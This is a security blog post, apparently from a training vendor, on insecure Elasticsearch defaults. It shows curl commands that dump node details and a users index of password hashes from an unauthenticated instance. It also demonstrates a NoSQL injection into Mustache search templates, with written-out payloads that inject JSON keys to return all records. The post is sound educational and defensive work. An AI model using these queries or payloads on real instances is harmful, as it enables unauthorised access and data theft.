Breaking: Elasticsearch instance left open wide by SomeCompany exposing millions of records, including passwords and other personal data… now to sports

Sound familiar? Headlines like this have become increasingly at home as front page news items over the past several years since the adoption of Elasticsearch, a powerful distributed search and analytics engine based on the Lucene indexing library, has exponentially increased. A seamless dovetailing of its rising popularity, and its stark lack of default-enabled security features, has ensured the widespread presence of misconfigured instances in the wild. This article explores the impact of a number of misconfigurations that occur when the best practice guidelines provided by the (excellent) official documentation are neglected.

Rubber ball

Elasticsearch exposes a JSON-based RESTful API interface that allows one to store, index, and search all kinds of documents. The general purpose nature of this project makes it versatile enough to be used in several scenarios, but its full-text document search functions, alongside its powerful log analysis, metrics, and event functions, is where it really shines. The development team continuously provide ready-made solutions that build upon the Elasticsearch core, exemplified by the relatively new addition to the Elastic Stack, Elastic SIEM, which is a specialized component that leverages the existing system to perform real-time analysis of security alerts and network events.

Elasticsearch is a complex system overall, but for the sake of the article, we can think of it as a fancy NoSQL database, or perhaps more precisely, an extremely powerful, pliable, document storage system. This post briefly outlines the impact of leaving an unsecured (and possibly outdated) Elasticsearch instance in the cloud, and some obvious mitigation strategies. Moreover, it discusses an interesting case of NoSQL injection that may happen when using search templates.

In the following, we’ll use curl to interact with the exposed REST API for the sake of convenience, but the same can be achieved using the Java High Level REST Client too.

Exposed instances

Newcomers can start an Elasticsearch instance in seconds; in fact, a basic setup requires no configuration, and the server is immediately able to process requests on TCP port 9200… with no authentication whatsoever. Anyone able to reach the REST server can issue a command of their choice since there is no access control in place by default. The default Elasticsearch security policy only works well if the instance resides in an isolated environment; this is by design, yet this is often overlooked by many developers and application architects that recklessly expose their Elasticsearch instances to the world.

The consequences are obvious: without any access control mechanism in place, there is no difference between a malicious user and the legitimate Elasticsearch administrator. This already says it all, but let’s take a look at some examples of what is possible when curl and an Elasticsearch instance meet in the wild. For starters, by simply querying the REST URL, it is possible to obtain some basic information about the host and the software running on it:

$ curl elasticsearch.secureflag.com:9200/?pretty=true
{
  "name" : "5d9daa95e92d",
  "cluster_name" : "docker-cluster",
  "cluster_uuid" : "eVG_XS50R6iAItE6vd4yDQ",
  "version" : {
    "number" : "7.8.1",
    "build_flavor" : "default",
    "build_type" : "docker",
    "build_hash" : "b5ca9c58fb664ca8bf9e4057fc229b3396bf3a89",
    "build_date" : "2020-07-21T16:40:44.668009Z",
    "build_snapshot" : false,
    "lucene_version" : "8.5.1",
    "minimum_wire_compatibility_version" : "6.8.0",
    "minimum_index_compatibility_version" : "6.0.0-beta1"
  },
  "tagline" : "You Know, for Search"
}

A much more detailed output can be obtained by querying information about the whole Elasticsearch cluster:

$ curl elasticsearch.secureflag.com:9200/_nodes?pretty=true

The output is too verbose to be shown here; however, each node of the Elasticsearch cluster contains the following details:

  • IP addresses and ports used by the Elasticsearch instance;
  • operative system and architecture;
  • hardware specification and computing power;
  • running JVM including the arguments (this can expose sensitive material such as local paths);
  • plugins and modules used by Elasticsearch including version numbers.

Now, of course, it is possible to query and interact with the indices, for example to access the users index:

$ curl http://elasticsearch.secureflag.com:9200/users/_search?pretty=true
{
  "took" : 14,
  "timed_out" : false,
  "_shards" : {
    "total" : 1,
    "successful" : 1,
    "skipped" : 0,
    "failed" : 0
  },
  "hits" : {
    "total" : {
      "value" : 2,
      "relation" : "eq"
    },
    "max_score" : 1.0,
    "hits" : [
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "t57pw3MBXOdYtjiqUWfb",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Alice",
          "email" : "alice@secureflag.com",
          "password" : "$2a$10$FhAbZ8itaZwK.qQcAyrOpeHb5ok.b9TOY7SVvRjsRART2cBEAwrVm"
        }
      },
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "uJ7pw3MBXOdYtjiqUmcU",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Bob",
          "email" : "bob@secureflag.com",
          "password" : "$2a$10$M.4rTvFfptlYX74H0m5WJ.qlYhdTmlG2Wdlin50OCXkym4.yyIbki"
        }
      }
    ]
  }
}

Needless to say, in this scenario it is also possible to delete, insert, and alter the content of the indices. Last but not least, another important aspect to consider is the fact that the aforementioned interaction happens over an insecure HTTP transport by default.

This misconfiguration is the most common scenario, and one that has been exploited numerous times in recent years: recall the headline regarding an unsecured and exposed Elasticsearch instance leaking sensitive data such as passwords, phone numbers, personal conversations, etc. One of the most recent examples of an instance incident involves a popular VPN provider, UFO VPN, which was discovered to have left one of its Elasticsearch clusters unsecured in the wild, leaking almost 1 TB of sensitive user material to whomever was in technical reach at the time. What’s worse is the ensuing loss of credibility that the company experienced, since this leak appears to (drastically!) contradict their privacy policy about what information they collect and how.

The obvious mitigation for all of this is to simply cease exposing insecure Elasticsearch instances to the world! Most of the time, there is simply no reason at all to do otherwise, especially for small solutions. There are, however, cases in which this approach is not feasible, so developer and application architects have employed creative and often error-prone solutions to overcome the lack of security features in Elasticsearch. One common approach has been to place a proxy in front of the Elasticsearch cluster to provide encrypted communication and authentication. Luckily, since versions 6.8.0 and 7.1.0, the free version of Elasticsearch now ships with some core security features that previously required a Gold subscription, including: TLS for encrypted communications, role-based access control (RBAC), etc.

While this is great news, those are opt-in features that require some configuration, and users should be aware of this so they can refer to the official documentation to learn how to secure their stack.

NoSQL injection

Even a properly secured Elasticsearch cluster might still be vulnerable to a subtle form of NoSQL injection. In fact, there are many ways to perform queries against the database, one of which is by using search templates. A search template is a way to specify parameterised queries, with the mechanism using the Mustache template language to describe the partial query.

For example, consider the following convoluted search template that can be used to filter the hits where the email fields match the value specified by the template parameter {{{email}}}:

$ curl 'http://elasticsearch.secureflag.com:9200/_scripts/my-template?pretty=true' \
        -H 'Content-Type: application/json' -d @- <<EOF
{
  "script": {
    "lang": "mustache",
    "source": {
      "query": {
        "match": {
          "email": {
            "query": "{{{email}}}",
            "operator": "and"
          }
        }
      }
    }
  }
}
EOF
{
  "acknowledged" : true
}

The above request registers the search template called my-template; it can then be used to lookup the user whose email is bob@secureflag.com:

$ curl 'http://elasticsearch.secureflag.com:9200/users/_search/template?pretty=true' \
     -H 'Content-Type: application/json' -d @- <<EOF
{
  "id": "my-template",
  "params": {
    "email": "bob@secureflag.com"
  }
}
EOF
{
  "took" : 6,
  "timed_out" : false,
  "_shards" : {
    "total" : 1,
    "successful" : 1,
    "skipped" : 0,
    "failed" : 0
  },
  "hits" : {
    "total" : {
      "value" : 1,
      "relation" : "eq"
    },
    "max_score" : 0.8754687,
    "hits" : [
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "u57qw3MBXOdYtjiq5mfi",
        "_score" : 0.8754687,
        "_source" : {
          "fullname" : "Bob",
          "email" : "bob@secureflag.com",
          "password" : "$2a$10$M.4rTvFfptlYX74H0m5WJ.qlYhdTmlG2Wdlin50OCXkym4.yyIbki"
        }
      }
    ]
  }
}

However, there is a problem with that template; using three curly braces pairs in {{{email}}} inhibits the automatic escaping mechanism of Mustache, thus causing double quotes to literally be inserted in the Elasticsearch query. This allows a malicious user, who is somewhat in control of the email parameter, to craft a special payload that escapes the JSON string associated to the email JSON key.

To better understand this, let us consider an example where the following value is assigned to the email parameter:

whatever","injected-key":"injected-value

It is possible to ask Elasticsearch to render a template without actually executing it, so:

$ curl 'http://elasticsearch.secureflag.com:9200/users/_search/template?pretty=true' \
     -H 'Content-Type: application/json' -d @- <<EOF
{
  "id": "my-template",
  "params": {
    "email": "whatever\",\"INJECTED-KEY\":\"INJECTED-VALUE"
  }
}
EOF
{
  "template_output" : {
    "query" : {
      "match" : {
        "email" : {
          "query" : "whatever",
          "INJECTED-KEY" : "INJECTED-VALUE",
          "operator" : "and"
        }
      }
    }
  }
}

Et voilà, we successfully managed to inject a JSON key-value pair into the query! This can be exploited to alter the semantics of the query and hence its results.

For example, we can nullify the effect of match by submitting an empty query and setting the zero_terms_query parameter to all. This parameter controls the behavior of Elasticsearch when the text analyzer produces an empty query. By passing all, we are requesting that all the documents are returned when this happens, while by passing an empty string as the query, we are making sure that the result after the analysis is an empty string as well.

The following query is equivalent to a match_all query:

$ curl 'http://elasticsearch.secureflag.com:9200/users/_search/template?pretty=true' \
     -H 'Content-Type: application/json' -d @- <<EOF
{
  "id": "my-template",
  "params": {
    "email": "\",\"zero_terms_query\":\"all"
  }
}
EOF
{
  "took" : 2,
  "timed_out" : false,
  "_shards" : {
    "total" : 1,
    "successful" : 1,
    "skipped" : 0,
    "failed" : 0
  },
  "hits" : {
    "total" : {
      "value" : 2,
      "relation" : "eq"
    },
    "max_score" : 1.0,
    "hits" : [
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "up7qw3MBXOdYtjiq5mej",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Alice",
          "email" : "alice@secureflag.com",
          "password" : "$2a$10$FhAbZ8itaZwK.qQcAyrOpeHb5ok.b9TOY7SVvRjsRART2cBEAwrVm"
        }
      },
      {
        "_index" : "users",
        "_type" : "_doc",
        "_id" : "u57qw3MBXOdYtjiq5mfi",
        "_score" : 1.0,
        "_source" : {
          "fullname" : "Bob",
          "email" : "bob@secureflag.com",
          "password" : "$2a$10$M.4rTvFfptlYX74H0m5WJ.qlYhdTmlG2Wdlin50OCXkym4.yyIbki"
        }
      }
    ]
  }
}

As we can see, the result now contains both the users.

Outdated versions

Out of all the vulnerabilities associated with Elasticsearch, the most impactful is very likely CVE-2014-3120. This flaw allowed an attacker to exploit the evaluation of dynamic scripts in the query to execute arbitrary, and potentially malicious, Java code on the server hosting the instance. Again, this is not a security flaw per se, but it can have a huge impact when coupled with the fact that it can be exploited remotely on an Elasticsearch instance left unsecured in the cloud.

Software has bugs and security flaws, and Elasticsearch is no exception. Thus, it is important to always stay up to date with the newest versions, as well as any associated security advisory. To emphasise this point, consider that the latest security issue (CVE-2020-7014) was only published a mere two months ago.

Wrap-up

Over the last few years, Elasticsearch become infamously known for its all too frequent links with large-scale, notorious data breaches. On its face, this might give the false impression that Elasticsearch is not a safe or particularly security-oriented product. However, the reality is that it is no less secure than any other database, it just comes out of the box with a set of insecure defaults. “Unsecure” here all depends on the context: Elasticsearch is secure by default as long as it is not exposed to untrusted parties and serves a single consumer; but this, of course, is often not the case.

The fact is that developers must know their tools. Unlike the headline that kicked off this article, this is not news, and it is certainly not limited to Elasticsearch. There is often plenty of documentation available, all you need to do is RTFM!

At SecureFlag, we teach Secure DevOps practices through hands-on, practical exercises to ensure your code and infrastructure are built as robustly as they can be. We know full well that good security practices can often be difficult to learn, let alone implement: that’s why we built a training platform to teach participants in real-time, on dedicated Elasticsearch instances, where they learn to identify security misconfigurations and remediate them hands-on.

SecureFlag Elasticsearch Exercise

The platform offers 100% hands-on training, with no multiple-choice questions involved, and uses an engine able to live-test user changes, instantly displaying whether the infrastructure has been secured, and awarding points upon exercise completion.

Security starts with the first keystroke - contact SecureFlag for a demo today!